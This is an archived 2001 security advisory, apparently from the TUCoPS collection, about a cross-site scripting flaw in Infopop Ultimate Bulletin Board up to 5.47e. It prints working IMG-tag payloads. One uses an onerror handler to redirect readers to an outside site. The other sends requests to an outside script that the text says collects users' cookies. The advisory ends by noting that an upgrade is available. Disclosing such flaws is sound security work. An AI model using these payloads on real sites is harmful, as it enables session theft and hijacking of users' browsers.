16th Nov 2001 [SBWID-4861]
COMMAND
Infopop Ultimate Bulletin Board
SYSTEMS AFFECTED
Up to 5.47e
PROBLEM
kyprizel <kyprizel@hostel.tusur.ru> posted :
Posting something like this UBB tag:
[IMG]http://about:test\"onerror=\"top.location.href=\'http://punk.tomsk.ru\';[/IMG]
to Infopop Ultimate Bulletin Board, we are able to redirect users
browser to http://punk.tomsk.ru There are many ways to stole cookies
using this vulnerabliety, one of them:
[IMG]http://about:test\"onerror=\"this.src=\'http://somedomain.com/yourscript.php\'[/IMG]
and yourscript.php - is a script to recieve users cookies 8)
SOLUTION
Upgrade available since February 2001
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
